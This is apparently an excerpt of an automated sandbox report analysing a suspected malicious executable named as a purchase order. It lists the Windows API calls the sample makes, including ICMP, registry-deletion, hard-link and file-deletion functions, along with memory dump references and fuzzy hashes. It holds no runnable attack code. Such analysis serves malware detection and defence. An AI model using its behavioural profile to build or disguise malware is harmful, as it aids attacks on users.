                                                                            • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                            APIs
                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • GetMenuItemInfoW.USER32 ref: 00449727
                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                            • DrawMenuBar.USER32 ref: 00449761
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$InfoItem$Draw_malloc
                                                                            • String ID: 0
                                                                            • API String ID: 772068139-4108050209
                                                                            • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                            • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                            • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                            • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$_wcscpy
                                                                            • String ID: 3, 3, 8, 1
                                                                            • API String ID: 3469035223-357260408
                                                                            • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                            • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                            • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                            • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                            • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: ICMP.DLL$IcmpCloseHandle
                                                                            • API String ID: 2574300362-3530519716
                                                                            • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                            • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                            • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                            • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                            • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: ICMP.DLL$IcmpCreateFile
                                                                            • API String ID: 2574300362-275556492
                                                                            • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                            • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                            • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                            • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                            • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: ICMP.DLL$IcmpSendEcho
                                                                            • API String ID: 2574300362-58917771
                                                                            • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                            • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                            • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                            • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                            • API String ID: 2574300362-4033151799
                                                                            • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                            • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                            • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                            • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                            • API String ID: 2574300362-1816364905
                                                                            • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                            • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                                                                            • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                            • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                            • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                            • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                            • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                            • VariantClear.OLEAUT32(?), ref: 00479650
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$AllocClearCopyInitString
                                                                            • String ID:
                                                                            • API String ID: 2808897238-0
                                                                            • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                            • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                            • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                            • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                            • __itow.LIBCMT ref: 004699CD
                                                                              • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                            • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                            • __itow.LIBCMT ref: 00469A97
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$__itow
                                                                            • String ID:
                                                                            • API String ID: 3379773720-0
                                                                            • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                            • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                            • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                            • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                            • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientMoveRectScreen
                                                                            • String ID:
                                                                            • API String ID: 3880355969-0
                                                                            • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                            • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                            • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                            • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                            • String ID:
                                                                            • API String ID: 2782032738-0
                                                                            • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                            • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                            • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                            • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                            APIs
                                                                            • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                            • GetWindowRect.USER32(?,?), ref: 00441722
                                                                            • PtInRect.USER32(?,?,?), ref: 00441734
                                                                            • MessageBeep.USER32(00000000), ref: 004417AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 1352109105-0
                                                                            • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                            • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                            • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                            • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                            APIs
                                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                            • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 3321077145-0
                                                                            • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                            • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                            • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                            • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                            APIs
                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                            • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                            • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                            • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                            • String ID:
                                                                            • API String ID: 3058430110-0
                                                                            • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                            • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                            • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                            • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 004503C8
                                                                            • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                            • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                            • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
